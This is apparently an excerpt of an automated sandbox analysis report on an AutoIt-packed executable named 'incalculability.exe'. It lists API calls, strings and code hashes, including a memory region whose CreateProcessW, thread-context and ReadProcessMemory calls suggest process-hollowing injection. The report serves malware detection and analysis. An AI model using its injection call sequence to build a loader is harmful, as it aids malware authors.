                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: _malloc
                            • String ID: Default
                            • API String ID: 1579825452-753088835
                            • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                            • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove_strcat
                            • String ID: AU3!$EA06
                            • API String ID: 1268643489-2658333250
                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                            Control-flow Graph

                            APIs
                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                            • CreatePopupMenu.USER32 ref: 00401204
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                            Control-flow Graph

                            APIs
                            • _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • std::exception::exception.LIBCMT ref: 00411626
                            • std::exception::exception.LIBCMT ref: 00411640
                            • __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                            • String ID: ,*H$4*H$@fI
                            • API String ID: 615853336-1459471987
                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                            Control-flow Graph

                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F27F91
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F281B7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                            • Instruction ID: 12b134ac432d97273e8eb480d73cc5925c762a194c616b187beaab1c55dc45ab
                            • Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                            • Instruction Fuzzy Hash: B4A13875E00219EBDB14CFA4C894BEEBBB5FF48304F248599E611BB290C7759A41CF94

                            Control-flow Graph

                            APIs
                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                            • _wcsncpy.LIBCMT ref: 004102ED
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                            • _wcsncpy.LIBCMT ref: 00410340
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                            • String ID: C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3170942423-3305596882
                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 3300667738-0
                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                            Control-flow Graph

                            APIs
                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            APIs
                              • Part of subcall function 03F27B20: Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F27D93
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: 6PMEYP3BRCEVO4KGOPEMO0BVBCDN
                            • API String ID: 2694422964-132674940
                            APIs
                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcsncpy.LIBCMT ref: 00401C41
                            • _wcscpy.LIBCMT ref: 00401C5D
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                            • String ID: Line:
                            • API String ID: 1874344091-1585850449
                            APIs
                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Close$OpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 1607946009-824357125
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03F2734D
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F27371
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F27393
                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 03F2769C
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                            • String ID:
                            • API String ID: 572931308-0
                            APIs
                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                            • _free.LIBCMT ref: 004295A0
                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 3938964917-2102448705
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: Error:
                            • API String ID: 4104443479-232661952
                            APIs
                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                            • String ID: X$pWH
                            • API String ID: 85490731-941433119
                            APIs
                            • _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 00401B57
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                            • String ID: @EXITCODE
                            • API String ID: 2734553683-3436989551
                            Strings
                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 00410107
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _strcat
                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 1765576173-2887687278
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 1794320848-0
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID:
                            • API String ID: 2429186680-0
                            APIs
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconNotifyShell_
                            • String ID:
                            • API String ID: 1144537725-0
                            APIs
                            • _malloc.LIBCMT ref: 0043214B
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _malloc.LIBCMT ref: 0043215D
                            • _malloc.LIBCMT ref: 0043216F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc$AllocateHeap
                            • String ID:
                            • API String ID: 680241177-0
                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                            APIs
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekTranslate
                            • String ID:
                            • API String ID: 4217535847-0
                            • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                            • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 03F27C0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: e9f3c6bf1166c7988bd63a796cb0a0cfd20f0fa3a81062b5847834b26c8814aa
                            • Instruction ID: 45671e2674b3a1a1f49ffb5c5ce38bc242e4885814a53f76a13bb94a1fe39fe8
                            • Opcode Fuzzy Hash: e9f3c6bf1166c7988bd63a796cb0a0cfd20f0fa3a81062b5847834b26c8814aa
                            • Instruction Fuzzy Hash: DE011D7594031DABDB20EFE0CC49FFE7B7CAF44701F408959BA159A181EA7896488BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                            • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                            • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                            • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                            APIs
                            • __wsplitpath.LIBCMT ref: 004678F7
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLast__wsplitpath_malloc
                            • String ID:
                            • API String ID: 4163294574-0
                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                            APIs
                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                            • _strcat.LIBCMT ref: 0040F786
                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                            • String ID:
                            • API String ID: 3199840319-0
                            • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                            • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                            APIs
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FreeInfoLibraryParametersSystem
                            • String ID:
                            • API String ID: 3403648963-0
